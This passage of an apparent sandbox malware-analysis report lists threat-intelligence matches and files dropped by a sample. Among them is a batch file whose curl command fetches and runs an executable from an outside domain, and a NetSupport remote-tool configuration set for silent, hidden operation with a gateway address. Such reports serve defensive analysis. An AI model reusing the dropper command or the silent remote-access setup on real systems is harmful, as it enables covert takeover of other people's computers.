                                                          • 188.127.225.160
                                                          sett.batGet hashmaliciousUnknownBrowse
                                                          • 188.127.225.160
                                                          h60FUiSRcC.jsGet hashmaliciousUnknownBrowse
                                                          • 188.127.225.160
                                                          2023-07-12-Gozi.dllGet hashmaliciousUrsnif, Strela StealerBrowse
                                                          • 91.199.147.95
                                                          niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                          • 188.127.225.160
                                                          niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                          • 188.127.225.160
                                                          Chrome_update.jsGet hashmaliciousUnknownBrowse
                                                          • 188.127.227.91
                                                          Chrome_update.jsGet hashmaliciousUnknownBrowse
                                                          • 188.127.227.91
                                                          Chrome_update.jsGet hashmaliciousUnknownBrowse
                                                          • 188.127.227.91

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0ePURCHASE_ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 188.127.230.147
                                                          BuDi9SwQKg.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 188.127.230.147
                                                          Loading.htaGet hashmaliciousUnknownBrowse
                                                          • 188.127.230.147
                                                          Shipment_document.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 188.127.230.147
                                                          PO_H0001.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 188.127.230.147
                                                          103603-81075327-LBP23103603039.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 188.127.230.147
                                                          2082023_ACB_-_91xxxxx8.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 188.127.230.147
                                                          inquiry.gz.exeGet hashmaliciousAveMaria, DarkTortilla, UACMeBrowse
                                                          • 188.127.230.147
                                                          SecuriteInfo.com.Win32.TrojanX-gen.20453.16698.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 188.127.230.147
                                                          SecuriteInfo.com.Variant.MSILHeracles.99664.10813.18235.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 188.127.230.147
                                                          vneROOOdoO.exeGet hashmaliciousMinerDownloader, XmrigBrowse
                                                          • 188.127.230.147
                                                          SC_3_3_0_50327.msiGet hashmaliciousUnknownBrowse
                                                          • 188.127.230.147
                                                          P.O_2023-037.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 188.127.230.147
                                                          u9bVqOPg1k.exeGet hashmaliciousDCRatBrowse
                                                          • 188.127.230.147
                                                          UiEC2gnec2.exeGet hashmaliciousRedLineBrowse
                                                          • 188.127.230.147
                                                          http://159.203.224.34Get hashmaliciousUnknownBrowse
                                                          • 188.127.230.147
                                                          PRy3ecrg25.exeGet hashmaliciousDCRatBrowse
                                                          • 188.127.230.147
                                                          file.exeGet hashmaliciousRedLineBrowse
                                                          • 188.127.230.147
                                                          enc.htaGet hashmaliciousCobalt StrikeBrowse
                                                          • 188.127.230.147
                                                          l9Ak6sEIvY.exeGet hashmaliciousXmrigBrowse
                                                          • 188.127.230.147

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\ProgramData\7z.bat

                                                          Download File
                                                          Process:C:\Windows\System32\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):246
                                                          Entropy (8bit):5.2705539432340505
                                                          Encrypted:false
                                                          SSDEEP:6:CxBR2WXp+N23f7fFlCe8UlLAHbKx4/mWB1WXp+N23fmvn:cnHDfFADC0ve1+v
                                                          MD5:5E4CD674AF2CD6A1D70DCA016DBFE48D
                                                          SHA1:745DA26B32D93A424BD117E8A432B90722E3F438
                                                          SHA-256:118B309EA9A4D1041EC6EE4B6104217D8928D631FF2B74211E6398817D8E71DB
                                                          SHA-512:8F17708CB62CE2C8F85580AFFF240BB1CEF7D50FD7885D795D535D26A48903995D789AD713B88CBCD6CAAED5F6CCBEAA70A379E0FC4CF100333971C17CB832D5
                                                          Malicious:false
                                                          Preview:if not exist "C:\Users\user\AppData\Local\Temp/7zz.exe" ( curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe" ) .."C:\Users\user\AppData\Local\Temp/7zz.exe"..

                                                          C:\ProgramData\7zz.exe

                                                          Download File
                                                          Process:C:\Windows\System32\curl.exe
                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                          Category:modified
                                                          Size (bytes):587776
                                                          Entropy (8bit):6.439962628647099
                                                          Encrypted:false
                                                          SSDEEP:12288:myyKdVnyNhXCV4EkP7AIfzNXZ0b5NrnkcAqIV0A1caRI:mKvyNhXCV4E8BXAfrnkcAqU0A
                                                          MD5:42BADC1D2F03A8B1E4875740D3D49336
                                                          SHA1:CEE178DA1FB05F99AF7A3547093122893BD1EB46
                                                          SHA-256:C136B1467D669A725478A6110EBAAAB3CB88A3D389DFA688E06173C066B76FCF
                                                          SHA-512:6BC519A7368EE6BD8C8F69F2D634DD18799B4CA31FBC284D2580BA625F3A88B6A52D2BC17BEA0E75E63CA11C10356C47EE00C2C500294ABCB5141424FC5DC71C
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.rR9p..9p..9p..Bl..;p...l.. p...V..[p...xC.8p..9p...p...xA.>p...V...p..V....p..V...;p...v..8p..Rich9p..................PE..L....S.L............................L.............@.........................................................................\...P.......(...............................................................................P............................text............................... ..`.rdata..............................@..@.data............l..................@....sxdata.............................@....rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\CacheURL.dat

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):48
                                                          Entropy (8bit):4.448934896284057
                                                          Encrypted:false
                                                          SSDEEP:3:N8YW2TdBLESqNXLEXNCv:2YLTdB6NgXS
                                                          MD5:39F6D8FA3BD905E03B0CC8CC16707E2B
                                                          SHA1:872DCC92BFF8F52A8F6BD1905F959C991C607472
                                                          SHA-256:54B920F5B87019FCF313BEC4D9F4639A932B8268E5183B29804E91E29ED6F726
                                                          SHA-512:B9C726C0164AAB96D53795202C95591285FAAE8D882E0F0B6601189011C085349969ADF484947F0CBC64966A4A6593F483B8A32E9778E741D24519CF17D04B1E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:https://magydostravel.com/cdn/zwmrqqgqnaww.php..

                                                          C:\ProgramData\HTCTL32.DLL

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):328056
                                                          Entropy (8bit):6.7547459359511395
                                                          Encrypted:false
                                                          SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                          MD5:C94005D2DCD2A54E40510344E0BB9435
                                                          SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                          SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                          SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                          Malicious:false
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\HTCTL32.DLL, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\HTML_Obj_list.txt

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):298
                                                          Entropy (8bit):4.25628025837569
                                                          Encrypted:false
                                                          SSDEEP:6:0MUIbLESrO4ywjsKVw1ASywzJHI3Sc8klIoAhHFN1zNseIR3VwWzt3YYn:0M+74+KAAObelqrU1YYn
                                                          MD5:3FA98AC589AC2B284F4D625A620D66BC
                                                          SHA1:6E473A2A0C95367A61AB98AAD4472577246E42F0
                                                          SHA-256:D9AE5DC5F2C4964C1E7BA3BE64CBA37F3043484DB9056D3A828102275D7D4101
                                                          SHA-512:FA4BB059BFB9305CBB0DA36B8AE51ACD3EBC151616FBD711494A3F60353C915BE947F24AF81145920F6F4AE234712B6F5223A630E3C1748B2D8E79A3D648BAD0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<script;>;</script>.. onLoad;";".. onunload;";".. onchange;";".. onsubmit;";".. onreset;";".. onselect;";".. onblur;";".. onfocus;";".. onkeydown;";".. onkeypress;";".. onkeyup;";".. onclick;";".. ondblclick;";".. onmousedown;";".. onmousemove;";".. onmouseout;";".. onmouseover;";".. onmouseup;";"

                                                          C:\ProgramData\NSM.LIC

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):258
                                                          Entropy (8bit):5.1458289587885675
                                                          Encrypted:false
                                                          SSDEEP:6:O/oPDvXk4xRPjwx3LzX81DKHMoEEjLgpW2MorGLUfKdYpPM/ioxTKa8l6i7s:X7XZR7wx3LzXBJjjqW2M23KKPM/iox7X
                                                          MD5:1B41E64C60CA9DFADEB063CD822AB089
                                                          SHA1:ABFCD51BB120A7EAE5BBD9A99624E4ABE0C9139D
                                                          SHA-256:F4E2F28169E0C88B2551B6F1D63F8BA513FEB15BEACC43A82F626B93D673F56D
                                                          SHA-512:C97E0EABEA62302A4CFEF974AC309F3498505DD055BA74133EE2462E215B3EBC5C647E11BCBAC1246B9F750B5D09240CA08A6B617A7007F2FA955F6B6DD7FEE4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:1200..0xa353ff01....; NetSupport License File...; Generated on 14:45 - 17/07/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=HANEYMANEY..maxslaves=8888..os2=1..product=10..serial_no=NSM385736..shrink_wrap=0..transport=0..

                                                          C:\ProgramData\NSM.ini

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:Generic INItialization configuration [Features]
                                                          Category:dropped
                                                          Size (bytes):6458
                                                          Entropy (8bit):4.645519507940197
                                                          Encrypted:false
                                                          SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                          MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                          SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                          SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                          SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

                                                          C:\ProgramData\PCICHEK.DLL

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):18808
                                                          Entropy (8bit):6.292094060787929
                                                          Encrypted:false
                                                          SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                          MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                          SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                          SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                          SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                          Malicious:false
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\PCICHEK.DLL, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\PCICL32.DLL

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3740024
                                                          Entropy (8bit):6.527276298837004
                                                          Encrypted:false
                                                          SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                          MD5:D3D39180E85700F72AAAE25E40C125FF
                                                          SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                          SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                          SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                          Malicious:false
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\PCICL32.DLL, Author: Joe Security
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\PCICL32.DLL, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

                                                          C:\ProgramData\PScripts\insert_delimiter.pscript

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1286
                                                          Entropy (8bit):3.2151299174173276
                                                          Encrypted:false
                                                          SSDEEP:24:QesElfxUbrVQwd8fYLAgcti3fwTONDKA2tCO4YTONQO2ONDIc4TWoV:LdxUbZ7Jc8fwTOgvv4YTOp2OCcGV
                                                          MD5:3C0C93F687DCE4D43BDB60237BBD0B54
                                                          SHA1:D66CA3BC8AD49532ECD1B22241650C24DE801BA7
                                                          SHA-256:4B460FDE39403B5FC251388363565BDCF4B3EB1FD23873154EFE61E6FC482042
                                                          SHA-512:06614A9C48B904D616AC2B60A9DF06ECA67A0EAB15A700563D98B10CB0F0461C0F978EC4289328AEAD6561226DF1391E973B8D1C1EA58822F6CF57183F525A33
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..{.....I.n.s.e.r.t. .a. .d.e.l.i.m.i.t.e.r. .a.t. .e.v.e.r.y. .n.-.t.h. .p.o.s.i.t.i.o.n.....}.........v.a.r..... . .i.:. .i.n.t.e.g.e.r.;..... . .j.:. .i.n.t.e.g.e.r.;..... . .k.:. .i.n.t.e.g.e.r.;..... . .d.:. .s.t.r.i.n.g.;. ././. .i.n.p.u.t. .b.u.f.f.e.r..... . .s.:. .s.t.r.i.n.g.;. ././. .o.u.t.p.u.t. .b.u.f.f.e.r..... . .d.l.m.t.:. .s.t.r.i.n.g.;..... . .s.t.e.p.:. .i.n.t.e.g.e.r.;.....b.e.g.i.n..... . ..... . .s.t.e.p. .:.=. .4.;..... . .i. .:.=. .0.;. ././. .o.f.f.s.e.t..... . .d.l.m.t. .:.=. .'.%.u.'.;..... . ..... . .d. .:.=. .R.e.a.d.D.o.c.;..... . .s. .:.=. .'.'.;..... . .j. .:.=. .l.e.n.g.t.h.(.d.).;..... . .w.h.i.l.e. .i. .<. .j. .d.o..... . .b.e.g.i.n..... . . . .s. .:.=. .s. .+. .d.l.m.t.;. ././. .i.n.s.e.r.t. .d.e.l.i.m.i.t.e.r. .b.e.f.o.r.e. .d.a.t.a. .m.e.m.b.e.r..... . . . .f.o.r. .k. .:.=. .1. .t.o. .s.t.e.p. .d.o..... . . . .b.e.g.i.n..... . . . . . .i.f. .(.i. .+. .k.). .<.=. .l.e.n.g.t.h.(.d.). .t.h.e.n..... . . . . . .s. .:.=. .s. .+. .d.[.i. .+. .k.].;..... .

                                                          C:\ProgramData\PScripts\rot-13.pscript

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1274
                                                          Entropy (8bit):3.358913269584849
                                                          Encrypted:false
                                                          SSDEEP:24:Qe9J9qno9H6/oqspi7lk+ejGeIYelmpoO67SrZetYelJoO672ZeoYel0oO67SrZj:LD9wC6/VsGlk+sH6JH63H6JH6d
                                                          MD5:AC1CD856F434464D3F68465061171D0A
                                                          SHA1:57AE543F84214CF00576DB15BD24D2E1F3BD4768
                                                          SHA-256:2E4BD5557AEDD1743DA5FAB1B6995FBC447D6E9491D9EC59FA93AB889D8BCCD1
                                                          SHA-512:6348F2C1DD131231F041B5E59BB83EB7E337C93799A955DF66FB077DC3B91659263CF8780BC7A6A007008155CC2C83B0AB1AC145ABCA2A8FA7D3500AF46D1A49
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..{.....R.O.T. .1.3.....}.....v.a.r..... . .S.t.r.L.e.n.,. .i.,. .c.h.a.r.N.u.m. .:. .W.o.r.d.;..... . .I.n.p.u.t.,. .o.u.t.p.u.t.:. .s.t.r.i.n.g.;.....b.e.g.i.n..... . .I.n.p.u.t. .:.=. .R.e.a.d.D.o.c.;..... . .O.u.t.p.u.t. .:.=. .'.'.;..... . .S.t.r.L.e.n. .:.=. .L.e.n.g.t.h.(.I.n.p.u.t.).;......... . .f.o.r. .i.:.=. .1. .t.o. .S.t.r.L.e.n. .d.o..... . .b.e.g.i.n..... . . . .i.f. .(.I.n.p.u.t.[.i.]. .>.=. .'.A.'.). .a.n.d. .(.I.n.p.u.t.[.i.]. .<.=. .'.M.'.). .t.h.e.n..... . . . . . .I.n.p.u.t.[.i.]. .:.=. .c.h.r.(.o.r.d.(.I.n.p.u.t.[.i.].). .+. .1.3.)..... . . . .e.l.s.e..... . . . .i.f. .(.I.n.p.u.t.[.i.]. .>.=. .'.N.'.). .a.n.d. .(.I.n.p.u.t.[.i.]. .<.=. .'.Z.'.). .t.h.e.n..... . . . . . .I.n.p.u.t.[.i.]. .:.=. .c.h.r.(.o.r.d.(.I.n.p.u.t.[.i.].). .-. .1.3.)..... . . . .e.l.s.e..... . . . .i.f. .(.I.n.p.u.t.[.i.]. .>.=. .'.a.'.). .a.n.d. .(.I.n.p.u.t.[.i.]. .<.=. .'.m.'.). .t.h.e.n..... . . . . . .I.n.p.u.t.[.i.]. .:.=. .c.h.r.(.o.r.d.(.I.n.p.u.t.[.i.].). .+. .1.3.)..... . . . .e.l.

                                                          C:\ProgramData\Settings.txt

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:Generic INItialization configuration [en]
                                                          Category:dropped
                                                          Size (bytes):729
                                                          Entropy (8bit):5.161224970148946
                                                          Encrypted:false
                                                          SSDEEP:12:Sx425viDEWeQrCISTiS/RQDIYm1S8Cye07xWXgeVWBmmeAFm7Vp67WpAny:SN5viDdrtSOSu0YYTNkWQaaVw7WGy
                                                          MD5:BCCC9E937D8D72A12743D75A6B396A34
                                                          SHA1:7AC820493A357F17230CDCEEF37C69BF2510AB5C
                                                          SHA-256:8CB0F6D438DB151ED507299A64031B5C957141CFC632ACE95B9135168E0FD121
                                                          SHA-512:F9A42E7CCF3DF6D99846E8B05FE21C4D5CAFDFC24F97C0EEFBAE1E27B674E637FEAAE86A52E680A12A074AE695CD2E80FC8E5588AD46063B3ADBB4A6CB9D5CE2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:[Downloader]..UseUserAgent=1..UserAgentString=Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1) Opera 7.50 [en]..UseProxy=0..AutoRedirect=0..AutoReferrer=1..AutoParseLinks=1..UseCookies=1..SaveAsProject=1..AutoComplete=0..URLHistory=1..UseReferrer=1..ExtendedInfo=1..[Decoder]..UseHighlight=1..ReplaceEval=0..ReplaceEvalWith=evla..OverrideEval=0..AutoReplaceEval=0..[Proxy]..Address=..Port=..User=..Pass=..Hidden=1..[Monitor]..Multi=0..[Misc]..ClearClipboard=0..AutoParseLinks=1..ReplaceEval=0..ReplaceEvalWith=evla..AutoReplaceEval=0..ClearCache=1..ClearHistory=0..Language=default.lng..Highlight=1..OverrideEval=1..FontName=Tahoma..FontSize=8..[Display]..Highlight=1..FontName=MS Shell Dlg 2..FontSize=8..AutoFocusDecoder=0..

                                                          C:\ProgramData\TCCTL32.DLL

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):396664
                                                          Entropy (8bit):6.809064783360712
                                                          Encrypted:false
                                                          SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                          MD5:EAB603D12705752E3D268D86DFF74ED4
                                                          SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                          SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                          SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                          Malicious:false
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\TCCTL32.DLL, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\client32.exe

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):101680
                                                          Entropy (8bit):4.481468672521447
                                                          Encrypted:false
                                                          SSDEEP:384:qUjV5+6j6Qa86Fkv2Wr120hZIq6nYPL7NheMxnB1:qgVZl6FhWr80/h6EN/
                                                          MD5:F70B67C2B3204B7DDD8B755799CCCFF0
                                                          SHA1:A42E55E328D62D11E687C167BB7049D46F0F9B26
                                                          SHA-256:213AF995D4142854B81AF3CF73DEE7FFE9D8AD6E84FDA6386029101DBF3DF897
                                                          SHA-512:54FCBA8A063BFBAAE4C3A39624BF3407DB6AF5699AB8686F936AB03C5864DF7A44D089066FA2D4AEDF5AD50D6B04624966A5111BF57BEC1DDA74A571F1DD7C63
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\client32.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@.......................................@.................................< ..<....0...i...........t..0........... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\client32.ini

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):714
                                                          Entropy (8bit):5.272982980469994
                                                          Encrypted:false
                                                          SSDEEP:12:EbxS2h3q+jhGSGpBlsVTXuZ7+DP98XTKIDWss1CYublufN3Bu6a39GJ/:EbI2hFhapBlLoGXuIDvsPuGYT34t
                                                          MD5:A61475B49FEA7E08719A7E8AD1C5D278
                                                          SHA1:60591111A837C93ACF7E32096F43EA704831DA35
                                                          SHA-256:DC020C98ED1D39721AD1F127DC0C04A0735BD47C6B6ECD222683210A601D90DB
                                                          SHA-512:1CDAF447E9E591D44A1DE10453008391EE80EEF3FEC0EC8A6D354C15A9412AD87F7F33ABDF8F7C0F061F6FA70F759CDEB1352B620609B0A6F3E4AF82636D19FC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:0xb47c726d....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=0..DisableClientConnect=0..DisableCloseApps=1..DisableDisconnect=0..DisableManageServices=1..DisableMessage=1..DisableReplayMenu=0..DisableRequestHelp=0..HideWhenIdle=1..Protocols=3..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Users\Administrator\Desktop\1\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[Bridge]..Modem=....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=94.158.247.23:5050..GSK=FH;G@ADJ9J>ICLHA=K@MED..Port=5050..SecondaryGateway=..SecondaryPort=..

                                                          C:\ProgramData\desktop.ini

                                                          Download File
                                                          Process:C:\ProgramData\7zz.exe
                                                          File Type:Windows desktop.ini
                                                          Category:dropped
                                                          Size (bytes):96
                                                          Entropy (8bit):4.862313970853504
                                                          Encrypted:false
                                                          SSDEEP:3:0NdQDjo/KKQiWDy3c5kSRE2J5oH+fqLEcTvzTXyn:0NwoCKQiWDy3IZi23oH+4TvzTXyn
                                                          MD5:B21BF903986AC0CE3B7BB2371C8502D2
                                                          SHA1:FC8C4D1630A2198A95F9739BF16F53E83BF81174
                                                          SHA-256:BB2DF21D474ED3E383FE56691DD5FE9E441F2B163A82A2D4D1042783F249B70F
                                                          SHA-512:3B0BA816CEA96FB8648A6A3CD9421EBC03065C02B4047D29834B417EF25A10DE1B5B8DDFEE5BB85761D185DDB1B36F37193CAAE0B7894B5E3850F061459DF197
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:[.ShellClassInfo]..IconResource=C:\Users\daddy\AppData\Local\Microsoft\OneDrive\OneDrive.exe,1..

                                                          C:\ProgramData\lolo.7z

                                                          Download File
                                                          Process:C:\Windows\System32\curl.exe
                                                          File Type:7-zip archive data, version 0.4
                                                          Category:modified
                                                          Size (bytes):2306944
                                                          Entropy (8bit):7.999915641276459
                                                          Encrypted:true
                                                          SSDEEP:49152:rDHf7GK0RIZLYUIFWsFYL7084J3Sr7Y1t/iAJkxNkvTMTTi0oIFJePBM5Pl:rDHfcyZ8/FW8Y9m9i5IvEP
                                                          MD5:8970FCCD38432D3A6EEFED2F274709DF
                                                          SHA1:5EEFA6D5AF3ADC5A84A5E7BA66DE87779221CC02
